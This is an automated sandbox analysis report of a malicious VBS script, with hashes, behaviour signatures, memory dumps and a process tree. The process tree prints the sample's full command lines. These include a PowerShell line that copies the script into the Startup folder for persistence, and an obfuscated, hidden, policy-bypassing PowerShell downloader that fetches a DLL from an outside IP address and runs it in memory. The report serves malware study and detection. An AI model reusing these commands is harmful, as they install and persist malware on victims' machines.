Overview

overview

10

Static

static

9fb660eca8...bb.vbs

windows7_x64

10

9fb660eca8...bb.vbs

windows10_x64

10

Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    21-12-2021 18:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9fb660eca8d9ed1038a8cffc032e59bb.vbs

  • Size

    151KB

  • MD5

    9fb660eca8d9ed1038a8cffc032e59bb

  • SHA1

    4aff5b55b1b499cec665f46b132856a4a300b4e9

  • SHA256

    2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108

  • SHA512

    0bcb0de54a3bdbe9d0e2be1899ab05060a7db58ae6e53aeed82a54b99f126502e0366415e590f22909aa9531c272af8287c6d5f06ece31de21156bcc2ef81790

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • Runs ping.exe
        PID:764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
        3⤵
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1216

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    675a290a7eb9bdde78d257a2a9c89d56

    SHA1

    1a950c89cddccbabfeda0974400977871feda219

    SHA256

    6230cf1d410c04b2067152c53ceabd324b0b7a67bdc1b47bc64b321b0d5719be

    SHA512

    125c8b941fd157a25245e854f6e265ba22b1bf0ecb55f99f9de05228d1143b5f50489ec70d949ce624e23f277e1f827329c4c4402b09a2c22e728dcb8140438f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    675a290a7eb9bdde78d257a2a9c89d56

    SHA1

    1a950c89cddccbabfeda0974400977871feda219

    SHA256

    6230cf1d410c04b2067152c53ceabd324b0b7a67bdc1b47bc64b321b0d5719be

    SHA512

    125c8b941fd157a25245e854f6e265ba22b1bf0ecb55f99f9de05228d1143b5f50489ec70d949ce624e23f277e1f827329c4c4402b09a2c22e728dcb8140438f

    Download Submit

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • memory/764-57-0x0000000000000000-mapping.dmp

    Download

  • memory/1124-69-0x00000000026D0000-0x00000000026D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1124-77-0x00000000026DB000-0x00000000026FA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1124-70-0x00000000026D2000-0x00000000026D4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1124-71-0x00000000026D4000-0x00000000026D7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1124-64-0x0000000000000000-mapping.dmp

    Download

  • memory/1124-67-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1148-56-0x0000000000000000-mapping.dmp

    Download

  • memory/1216-76-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1216-79-0x00000000027D2000-0x00000000027D4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1216-82-0x00000000027DB000-0x00000000027FA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1216-81-0x000000001B780000-0x000000001BA7F000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/1216-72-0x0000000000000000-mapping.dmp

    Download

  • memory/1216-80-0x00000000027D4000-0x00000000027D7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1216-78-0x00000000027D0000-0x00000000027D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1364-58-0x0000000000000000-mapping.dmp

    Download

  • memory/1364-60-0x0000000001E70000-0x0000000001E72000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1364-68-0x0000000001E7B000-0x0000000001E9A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1364-62-0x0000000001E72000-0x0000000001E74000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1364-63-0x0000000001E74000-0x0000000001E77000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1364-61-0x000007FEF3780000-0x000007FEF42DD000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1596-55-0x000007FEFC371000-0x000007FEFC373000-memory.dmp

    Filesize

    8KB

    Download